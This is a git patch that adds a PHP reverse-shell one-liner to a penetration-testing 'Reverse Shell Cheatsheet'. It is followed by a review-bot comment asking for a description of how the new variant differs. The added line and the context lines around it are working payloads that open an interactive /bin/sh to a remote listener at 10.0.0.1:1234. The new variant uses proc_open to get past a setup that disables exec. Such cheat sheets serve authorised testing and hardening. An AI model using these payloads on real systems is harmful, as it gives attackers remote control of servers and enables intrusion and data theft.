From 9c188139eca99b01ea9f82639137a5121035787d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Gy=C3=B6rgy=20Demarcsek?= Date: Thu, 2 Jan 2020 19:27:35 +0100 Subject: [PATCH] Added PHP reverse shell This reverse shell payload for PHP works even if `exec` is disabled and/or the new socket is not on fd 3 --- Methodology and Resources/Reverse Shell Cheatsheet.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 5ccebd6..7c4bf85 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -107,6 +107,10 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1 php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ``` +```bash +php -r '$sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' +``` + ### Ruby ```ruby
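Review bot: The added `proc_open` one-liner in the PHP section of the cheat sheet has no text saying how it differs from the `exec` line directly above it, so the reason given in the commit message (it works when `exec` is disabled and/or the new socket is not on fd 3) is lost once the patch is merged. Suggest a one-line description above the new fence stating that this variant hands `$sock` to the child as descriptors 0, 1 and 2 through `proc_open` instead of relying on `<&3`, so readers can tell when each entry applies. The same sentence also serves readers who use this list for hardening, since it makes explicit that a `disable_functions` entry covering only `exec` does not cover `proc_open`.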